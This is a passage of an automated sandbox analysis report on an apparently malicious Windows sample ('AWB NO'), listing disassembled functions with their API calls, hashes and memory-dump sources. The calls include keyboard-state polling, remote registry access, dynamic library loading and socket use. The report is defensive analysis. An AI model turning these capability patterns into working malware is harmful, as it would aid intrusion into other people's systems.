                                                              • Opcode Fuzzy Hash: 49ba697defebaeff7bf3c6ed2474ef9451a394873102f99e0ceafb0c30f968ce
                                                              • Instruction Fuzzy Hash: 7A21D171100205AFEF506F64EC80EBF37ADEF59328F124A2AF910A2290E779CC419769
                                                              Function 0046703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 0046705E
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00467091
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 004670A3
                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 004670DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 01e20ca06717229d7de1ec3cf3768b9798ae8679633ac96eb37df0490b00c094
                                                              • Instruction ID: 9202ab078a4c3a503da059fcda44fa11a597938485d0537d731b61e6695388f4
                                                              • Opcode Fuzzy Hash: 01e20ca06717229d7de1ec3cf3768b9798ae8679633ac96eb37df0490b00c094
                                                              • Instruction Fuzzy Hash: B2219574504205ABDB209F39DC05A9A77B4BF44728F204A2AFDA0D73D0F7759850CB6A
                                                              Function 0046710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 0046712B
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0046715D
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 0046716E
                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004671A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 563ae3597cc525712e01c8339508356707790848640d06020bee104cb4be4cb4
                                                              • Instruction ID: fde4513149a148a3dd0ed9eecfc4b4dffc20060bf443cc96dc0213e778ed6211
                                                              • Opcode Fuzzy Hash: 563ae3597cc525712e01c8339508356707790848640d06020bee104cb4be4cb4
                                                              • Instruction Fuzzy Hash: CF21A475504205ABDB209F699C04ADA77A8AF56738F200A1FFDF0D33D0E77498418B5A
                                                              Function 00462017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00462048
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                              • API String ID: 3964851224-769500911
                                                              • Opcode ID: bc3c45dc2ffe3e5de0075f2b599e7b7c3e830a178b90029fa0367c546021c0dc
                                                              • Instruction ID: 77c5c7308804efc11e7610265b9817465ac0eb28ad2bd014a144432403cec0ba
                                                              • Opcode Fuzzy Hash: bc3c45dc2ffe3e5de0075f2b599e7b7c3e830a178b90029fa0367c546021c0dc
                                                              • Instruction Fuzzy Hash: F511A130D1012AEFCF00EFA4D9404EEB3B4FF15304B50846AD951A7352EB3A690ACB59
                                                              Function 0043AEE3 Relevance: 7.8, APIs: 5, Instructions: 253COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCPInfo.KERNEL32(00000000,00000000,004BC050,7FFFFFFF,00000000,?,0043B1B6,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0043AF92
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0043B1B6,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0043B00C
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0043B1B6,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0043B087
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0043B1B6,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0043B0A0
                                                                • Part of subcall function 0042594C: RtlAllocateHeap.NTDLL(01050000,00000000,00000001,00000000,?,?,?,00421013,?), ref: 0042598F
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0043B1B6,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0043B11D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapInfo
                                                              • String ID:
                                                              • API String ID: 1443698708-0
                                                              • Opcode ID: fa5abb88dfc21337b4677d4ddb89778d394d23ccb5ce3de8a2148f2fff6b29b9
                                                              • Instruction ID: df0bd9e1cc7d303a88c1f4738eed86a57aaa02276d4eee4d4d5c72510f150f2d
                                                              • Opcode Fuzzy Hash: fa5abb88dfc21337b4677d4ddb89778d394d23ccb5ce3de8a2148f2fff6b29b9
                                                              • Instruction Fuzzy Hash: D68101B2A001199FDF209F54D895AAFBBB9EF0D390F14111BE994E7340D739CC1587A9
                                                              Function 00476E17 Relevance: 7.8, APIs: 5, Instructions: 250networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476F14
                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476F35
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476F48
                                                              • inet_ntoa.WSOCK32(?), ref: 00476FBB
                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00476FFE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorLasthtonsinet_ntoa
                                                              • String ID:
                                                              • API String ID: 2227131780-0
                                                              • Opcode ID: 733ce334ef5fe533b2d754f83b2e7009d016e9df0b9239ceb82aa610c612a4f5
                                                              • Instruction ID: 17faa9dd7ded59eafe06aa6fc4fe4fc7440cd0719e375698d2b57dfaf69d4e3a
                                                              • Opcode Fuzzy Hash: 733ce334ef5fe533b2d754f83b2e7009d016e9df0b9239ceb82aa610c612a4f5
                                                              • Instruction Fuzzy Hash: 96810731504300ABD710EF25CC85EABB3E9AF84718F50852EF549A72D2DB789D05CB5A
                                                              Function 0047EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EF1B
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EF4B
                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047F07E
                                                              • CloseHandle.KERNEL32(?), ref: 0047F0FF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                              • String ID:
                                                              • API String ID: 2364364464-0
                                                              • Opcode ID: 9895d5f400ce381446d6b32e4ef20b1d2e104e97af49aea48b51b9c51eda27fe
                                                              • Instruction ID: 3fe6ad2c0d9549654d5aeb1e74c9589e22947f5369bd7a7a210fad0d8dbecfab
                                                              • Opcode Fuzzy Hash: 9895d5f400ce381446d6b32e4ef20b1d2e104e97af49aea48b51b9c51eda27fe
                                                              • Instruction Fuzzy Hash: F58193716043009FD720DF29C846B6AB7E5AF48714F04882EF999EB3D2D778AC048B99
                                                              Function 0045F3DD Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0045F3F7
                                                              • VariantClear.OLEAUT32(00000013), ref: 0045F469
                                                              • VariantClear.OLEAUT32(00000000), ref: 0045F4C4
                                                              • VariantClear.OLEAUT32(?), ref: 0045F53B
                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F569
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Variant$Clear$ChangeInitType
                                                              • String ID:
                                                              • API String ID: 4136290138-0
                                                              • Opcode ID: e0e4c2a5e8745864faa56e5889f7aed8dc9d36647b4b934b0d9476528ef57ffe
                                                              • Instruction ID: 2e2eaad49763833bbcfc7c68f572f088d5f8d2798b4c1c5c41ffca29e6c5e6c5
                                                              • Opcode Fuzzy Hash: e0e4c2a5e8745864faa56e5889f7aed8dc9d36647b4b934b0d9476528ef57ffe
                                                              • Instruction Fuzzy Hash: E6517BB5A00209EFCB10CF58D880AAAB7B8FF4C354B15856AED59DB301E734E915CFA5
                                                              Function 004802C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00480038,?,?), ref: 004810BC
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480388
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004803C7
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0048040E
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 0048043A
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00480447
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                              • String ID:
                                                              • API String ID: 3740051246-0
                                                              • Opcode ID: cb550a1bbbc5af6f23150f38ee1b1318605d1daf4a7197e745e8c148a530594b
                                                              • Instruction ID: 7badc380548c35aea7f7f809b9a1a6f3aba300e4843666839c15b29f7f22ac14
                                                              • Opcode Fuzzy Hash: cb550a1bbbc5af6f23150f38ee1b1318605d1daf4a7197e745e8c148a530594b
                                                              • Instruction Fuzzy Hash: DC514E31214204AFD704EF55C881E6FB7E8FF84708F44492EB59597292DB38ED09CB56
                                                              Function 0047DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047DC3B
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0047DCBE
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0047DCDA
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0047DD1B
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047DD35
                                                                • Part of subcall function 00405B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467B20,?,?,00000000), ref: 00405B8C
                                                                • Part of subcall function 00405B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467B20,?,?,00000000,?,?), ref: 00405BB0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                              • String ID:
                                                              • API String ID: 666041331-0
                                                              • Opcode ID: 5202b4d057b40a53c90a749aef0d59a434df16c393a62ce78a192738aab862cb
                                                              • Instruction ID: c61c6b43bc70afb9d3e84a1531022f1a83b1380635668ac81304b0fc5ff18549
                                                              • Opcode Fuzzy Hash: 5202b4d057b40a53c90a749aef0d59a434df16c393a62ce78a192738aab862cb
                                                              • Instruction Fuzzy Hash: 23512735A00205DFDB01EFA9C4849AEB7F4EF48314B14C06AE819AB352DB38AD45CF99
                                                              Function 004626F9 Relevance: 7.6, APIs: 5, Instructions: 138windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462792
                                                              • IsMenu.USER32(00000000), ref: 004627B2
                                                              • CreatePopupMenu.USER32 ref: 004627E6
                                                              • GetMenuItemCount.USER32(000000FF), ref: 00462844
                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462875
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                              • String ID:
                                                              • API String ID: 93392585-0
                                                              • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                              • Instruction ID: ae907cd3f2aa1f5fb6f168798142b7ed047680f4cd9d897be70698fd7a4ddbb7
                                                              • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                              • Instruction Fuzzy Hash: FD51B270A00705FFDF14DF68CE88AAEBBF4AF44314F10462EE4119B291E7B88904CB56
                                                              Function 0046E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E88A
                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E8B3
                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E8F2
                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E917
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E91F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$SectionWrite$String
                                                              • String ID:
                                                              • API String ID: 2832842796-0
                                                              • Opcode ID: 9f073d38051c757b9cf95d3ee0a8f0e233b2b007857ed0d59dbdf57c9ff52e59
                                                              • Instruction ID: eb2a6769bbfa44e6484f4cd1c5b7e7a31a5b3f962ab33e5677d97931e88bbd57
                                                              • Opcode Fuzzy Hash: 9f073d38051c757b9cf95d3ee0a8f0e233b2b007857ed0d59dbdf57c9ff52e59
                                                              • Instruction Fuzzy Hash: 91512C75A00205DFCB01EF65C9819AEBBF5EF08314B1480AAE849AB3A2DB35ED15CB55
                                                              Function 0048A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f3053dfce972360621ebc067b93fae9a4803b235720fd213c609bc488b71fb7e
                                                              • Instruction ID: 27f25d5971d4d65c6ff1b26a422dd0493a54250996370e31a1df588395131043
                                                              • Opcode Fuzzy Hash: f3053dfce972360621ebc067b93fae9a4803b235720fd213c609bc488b71fb7e
                                                              • Instruction Fuzzy Hash: EF41E335901104AFE710FB28CC48FAEBBA4EB09310F154977EC15A72E1D7B89D61DB5A
                                                              Function 00402344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 00402357
                                                              • ScreenToClient.USER32(004C67B0,?), ref: 00402374
                                                              • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                              • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AsyncState$ClientCursorScreen
                                                              • String ID:
                                                              • API String ID: 4210589936-0
                                                              • Opcode ID: aa170e235bd8e8c3be7ecfcb621341bfa51620c775f10e523610c288c0923c33
                                                              • Instruction ID: 2447c90426a38808cbef6312e0f9f8f6ce7d60f79d30bdc6c495824b4ec10740
                                                              • Opcode Fuzzy Hash: aa170e235bd8e8c3be7ecfcb621341bfa51620c775f10e523610c288c0923c33
                                                              • Instruction Fuzzy Hash: 2A416031904119FBDF159F65C888AEEBB74FB09324F20436BF824A22D0C7785954DF99
                                                              Function 00456920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0045695D
                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 004569A9
                                                              • TranslateMessage.USER32(?), ref: 004569D2
                                                              • DispatchMessageW.USER32(?), ref: 004569DC
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004569EB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                              • String ID:
                                                              • API String ID: 2108273632-0
                                                              • Opcode ID: 78944cadfa5f658e5d3a29197c4c53d74067a31d2e738c011e6355e338db77b1
                                                              • Instruction ID: d2d2e048b48428a59b764f729d5fd62b0118f84c124f9056e951ba18ffc78b82
                                                              • Opcode Fuzzy Hash: 78944cadfa5f658e5d3a29197c4c53d74067a31d2e738c011e6355e338db77b1
                                                              • Instruction Fuzzy Hash: B03109715041029ADB60DF74CC44FB7BBACAB05306F52857BEC11D3162D738984ED798
                                                              Function 00458F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00458F12
                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00458FBC
                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458FC4
                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00458FD2
                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458FDA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
                                                              • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                              • Instruction ID: f3feba45afbb173b7df5408e217b9ce9224db61ab9081f89c3f31a24f6b31fdf
                                                              • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                              • Instruction Fuzzy Hash: 9531DF72500219EBDB00CF68D94CA9E7BB6EB48316F10422EFD25E62D1CBB49918CB95
                                                              Function 0048B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
